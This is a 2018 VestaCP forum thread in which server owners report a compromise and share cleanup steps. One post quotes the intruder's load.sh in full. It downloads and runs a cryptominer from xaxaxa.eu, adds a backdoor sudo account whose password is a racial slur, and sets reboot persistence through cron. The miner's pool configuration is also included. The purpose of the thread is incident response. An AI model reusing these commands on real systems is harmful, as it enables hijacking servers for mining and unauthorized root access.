We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
have been HACKED ! by xaxaxa.eu
-
- Posts: 25
- Joined: Mon Nov 24, 2014 11:48 pm
have been HACKED ! by xaxaxa.eu
hello team,
just hacked by a dump hacker who use xaxaxa.eu/* and some sh script.
I am currently investiguating if vesta was on release 22.
/tmp/load.sh
/tmp/config_1.json
some file have been altered , what do you need to know if your patch covers that attempt ?
thank you ,
just hacked by a dump hacker who use xaxaxa.eu/* and some sh script.
I am currently investiguating if vesta was on release 22.
/tmp/load.sh
Code: Select all
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
wget -O /tmp/gcc http://xaxaxa.eu/gcc;
chmod +x gcc;
wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Code: Select all
{
"algo": "cryptonight",
"api": {
"port": 0,
"access-token": null,
"worker-id": null,
"ipv6": false,
"restricted": true
},
"av": 0,
"background": true,
"colors": true,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 100,
"pools": [
{
"url": "pool1.xaxaxa.eu:28000",
"user": "lol",
"pass": "lol",
"keepalive": true,
"nicehash": false,
"variant": -1
}
],
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null
}
thank you ,
Re: have been HACKED ! by xaxaxa.eu
Can you send a more informations about creation time of the files? Vesta Dev team has patched this issue with release 22, for further investigation we need to be sure that the infection was after upgrade to 22.
Re: have been HACKED ! by xaxaxa.eu
I have the same problem.
Running: and
Gives me:
But that's not the latest version, is it?
Running:
Code: Select all
apt-get update
Code: Select all
apt-get install vesta
Code: Select all
vesta is already the newest version (0.9.8-20)
Re: have been HACKED ! by xaxaxa.eu
I was hacked too by the same script.
To stop kickly and dirty, I have mount /tmp with noexec parameter :
And edit my /etc/hosts like this :
but the malware is still there...
The files /tmp/load.sh and /tmp/gcc was owned by admin user, the same as vestacp use...
To stop kickly and dirty, I have mount /tmp with noexec parameter :
Code: Select all
/dev/xvdc /tmp ext4 loop,noexec,nosuid,nodev,rw 0 0
Code: Select all
127.0.0.1 bigbatman.loan xaxaxa.eu
The files /tmp/load.sh and /tmp/gcc was owned by admin user, the same as vestacp use...
Last edited by Spheerys on Tue Jun 26, 2018 6:54 am, edited 1 time in total.
Re: have been HACKED ! by xaxaxa.eu
As you can read in the red banner in the forum, the newest version is 0.9.8-22. Please do:
This should update your system, normaly also vesta. Additional we start the internal upgrade script from vestacp in last part.
Then you can run this, when you get the same output, vesta is up to date:
Based on the informations I have and see, it is normal that the vesta-php and nginx package is on release 21.
Code: Select all
apt-get update && apt-get upgrade -y
cd /usr/local/vesta/bin
./v-update-sys-vesta-all
Then you can run this, when you get the same output, vesta is up to date:
Code: Select all
# cd /usr/local/vesta/bin
# ./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-25
vesta-php 0.9.8 21 amd64 yes 2018-05-17
vesta-nginx 0.9.8 21 amd64 yes 2018-05-17
Re: have been HACKED ! by xaxaxa.eu
based we try to answer the question "is the patch working": Did you upgraded to actual release?Spheerys wrote: ↑Tue Jun 26, 2018 6:50 amI was hacked too by the same script.
To stop kickly and dirty, I have mount /tmp with noexec parameter :And edit my /etc/hosts like this :Code: Select all
/dev/xvdc /tmp ext4 loop,noexec,nosuid,nodev,rw 0 0
but the malware is still there...Code: Select all
127.0.0.1 bigbatman.loan xaxaxa.eu
Re: have been HACKED ! by xaxaxa.eu
I did the recommanded upgrade but the malware is still present.
It insert a file on /etc/cron/d/php5 with this content :
And the /usr/lib/php5/sessionclean is :
It insert a file on /etc/cron/d/php5 with this content :
Code: Select all
29 */3 * * * root [ -x /usr/lib/php5/sessionclean ] && /usr/lib/php5/sessionclean
Code: Select all
/usr/lib/php5/sessionclean 2730/2730 100%
#!/bin/sh -e
#
# sessionclean - a script to cleanup stale PHP sessions
#
# Copyright 2013-2015 Ondřej Surý <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
SAPIS="apache2:apache2 apache2filter:apache2 cgi:php5 fpm:php5-fpm cli:php5"
# Iterate through all web SAPIs
(
proc_names=""
for sapi in ${SAPIS}; do
conf_dir=${sapi%%:*}
proc_name=${sapi##*:}
if [ -e /etc/php5/${conf_dir}/php.ini ]; then
# Get all session variables once so we don't need to start PHP to get each config option
session_config=$(PHP_INI_SCAN_DIR=/etc/php5/${conf_dir}/conf.d/ php5 -c /etc/php5/${conf_dir}/php.ini -d "error_repor
ting='~E_ALL'" -r 'foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";')
save_handler=$(echo "$session_config" | sed -ne 's/^session\.save_handler=\(.*\)$/\1/p')
save_path=$(echo "$session_config" | sed -ne 's/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p')
gc_maxlifetime=$(($(echo "$session_config" | sed -ne 's/^session\.gc_maxlifetime=\(.*\)$/\1/p')/60))
if [ "$save_handler" = "files" -a -d "$save_path" ]; then
proc_names="$proc_names $proc_name";
printf "%s:%s\n" "$save_path" "$gc_maxlifetime"
fi
fi
done
# first find all open session files and touch them (hope it's not massive amount of files)
for pid in $(pidof $proc_names); do
find "/proc/$pid/fd" -ignore_readdir_race -lname "$save_path/sess_\*" -exec touch -c {} \; 2>/dev/null
done
) | sort -rn -t: -k2,2 | sort -u -t: -k 1,1 | while IFS=: read -r save_path gc_maxlifetime; do
# find all files older then maxlifetime and delete them
find -O3 "$save_path/" -ignore_readdir_race -depth -mindepth 1 -name 'sess_*' -type f -cmin "+$gc_maxlifetime" -delete
done
exit 0
Re: have been HACKED ! by xaxaxa.eu
The upgrade does NOT remove the infection. If you are infected, you have to remove manually. The upgrade "only" fixes the security issue, that can cause an infection.
Re: have been HACKED ! by xaxaxa.eu
OK thanks.
I will document what I found to help cleaning for other...
I will document what I found to help cleaning for other...
Last edited by Spheerys on Tue Jun 26, 2018 7:22 am, edited 1 time in total.
Re: have been HACKED ! by xaxaxa.eu
Tutorial to stop the attack
It's not bullet proof and writen kickly and dirty : just cleaning what I have found and you may have to adapt it.
First, upgrade your system and VestaCP :
Look on this file or similar : /etc/cron/d/php5
If you are sure what you are doing, delete it.
Edit /usr/local/vesta/data/users/admin/cron.conf and remove last lines about the malware
Rebuild the vestacp cron of the admin user : v-rebuild-cron-jobs admin restart
Remove lastest lines of thoses files (which are talikng about sysroot account) :
Usefull tips :
- you can mount the /tmp partition with the noexec parameter to avoid execution script.
- you can edit your /etc/hosts file to avoid the connections on the distant malware scripts
- command to find the files modified during the last 600 minutes : find /usr/ -cmin -600
It's not bullet proof and writen kickly and dirty : just cleaning what I have found and you may have to adapt it.
First, upgrade your system and VestaCP :
Code: Select all
apt-get update && apt-get upgrade -y
cd /usr/local/vesta/bin
./v-update-sys-vesta-all
Look on this file or similar : /etc/cron/d/php5
If you are sure what you are doing, delete it.
Edit /usr/local/vesta/data/users/admin/cron.conf and remove last lines about the malware
Rebuild the vestacp cron of the admin user : v-rebuild-cron-jobs admin restart
Remove lastest lines of thoses files (which are talikng about sysroot account) :
- /etc/passwd
- /etc/group
- /etc/gshadow
- /etc/subuid
- /etc/shadow
- /etc/sudoers ((several lines !!!)
Usefull tips :
- you can mount the /tmp partition with the noexec parameter to avoid execution script.
- you can edit your /etc/hosts file to avoid the connections on the distant malware scripts
- command to find the files modified during the last 600 minutes : find /usr/ -cmin -600
Last edited by Spheerys on Thu Jun 28, 2018 8:59 pm, edited 6 times in total.